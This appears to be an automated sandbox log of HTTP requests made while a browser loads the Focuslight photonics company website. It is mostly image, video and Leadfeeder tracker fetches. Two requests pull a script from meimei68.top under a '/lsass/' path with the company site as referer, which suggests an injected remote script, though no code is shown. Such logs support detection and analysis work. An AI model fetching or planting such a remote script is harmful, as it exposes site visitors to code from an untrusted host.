Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/05/LWOP-EN-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/01/2025-2-28-%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90-EN-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/03/Global-Optimization-EN-1-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /lftracker_v1_ywVkO4X3lld7Z6Bj.js HTTP/1.1host: sc.lfeeder.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%85%89%E9%80%9A%E4%BF%A1.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/Focuslight-Advancing-Photonics-Technologies-Around-the-World-1.mp4 HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%85%88%E8%BF%9B%E5%88%B6%E9%80%A0.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E6%B1%BD%E8%BD%A6%E5%BA%94%E7%94%A8.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%8C%BB%E7%96%97%E5%81%A5%E5%BA%B7.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/01/%E8%BF%91%E6%9C%9F%E5%8F%82%E5%B1%95%E4%BF%A1%E6%81%AFEN.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /lsass/index.php?fHYWBUn3 HTTP/1.1Host: meimei68.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/09/%E7%A7%91%E5%AD%A6%E7%A0%94%E7%A9%B6.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/Focuslight-Advancing-Photonics-Technologies-Around-the-World-1.mp4 HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Language: en-US,en;q=0.9Range: bytes=160694272-160884554If-Range: "DC118A8773E9D272246DBD8EFF6CBA2D"
Source: global traffic HTTP traffic detected: GET /?sid=ywVkO4X3lld7Z6Bj&data=eyJnYVRyYWNraW5nSWRzIjpbXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbXSwiY29udGV4dCI6eyJsaWJyYXJ5Ijp7Im5hbWUiOiJsZnRyYWNrZXIiLCJ2ZXJzaW9uIjoiMi42OS4wIn0sInBhZ2VVcmwiOiJodHRwczovL3d3dy5mb2N1c2xpZ2h0LmNvbS8iLCJwYWdlVGl0bGUiOiJGb2N1c2xpZ2h0IOKAkyBOZXZlciBTdG9wIEV4cGxvcmluZyIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNGNlY2M1ZjUxNGI2YzNiNyIsInNjcmlwdElkIjoieXdWa080WDNsbGQ3WjZCaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuNjkzMWIzYWQyMTM5MGYwMy4xNzQ4MzcxOTEwNzQ5IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0= HTTP/1.1host: tr.lfeeder.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/Focuslight-Advancing-Photonics-Technologies-Around-the-World-1.mp4 HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Language: en-US,en;q=0.9Range: bytes=131072-160694271If-Range: "DC118A8773E9D272246DBD8EFF6CBA2D"
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo.svg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /lsass/index.js?8a7441451c8ad03d76 HTTP/1.1Host: meimei68.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /?sid=ywVkO4X3lld7Z6Bj&data=eyJnYVRyYWNraW5nSWRzIjpbXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbXSwiY29udGV4dCI6eyJsaWJyYXJ5Ijp7Im5hbWUiOiJsZnRyYWNrZXIiLCJ2ZXJzaW9uIjoiMi42OS4wIn0sInBhZ2VVcmwiOiJodHRwczovL3d3dy5mb2N1c2xpZ2h0LmNvbS8iLCJwYWdlVGl0bGUiOiJGb2N1c2xpZ2h0IOKAkyBOZXZlciBTdG9wIEV4cGxvcmluZyIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNGNlY2M1ZjUxNGI2YzNiNyIsInNjcmlwdElkIjoieXdWa080WDNsbGQ3WjZCaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuNjkzMWIzYWQyMTM5MGYwMy4xNzQ4MzcxOTEwNzQ5IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0= HTTP/1.1host: tr.lfeeder.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jticn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jticn1.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn1.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn2.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/spvideicn.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jiantouup.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/clicook.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jjbg.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/xingxingmap.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jgdtline.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/closevideo0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/footbg.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/fybg.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: i
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/10/cropped-favicon-32x32.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/20230911094506.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn2.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn3.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/weixincodeimage.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo1.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Heptagon-Logo.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/09/02%E5%8D%8A%E5%AF%BC%E4%BD%93%E6%BF%80%E5%85%89%E5%85%83%E5%99%A8%E4%BB%B6.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/xingxingmap.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
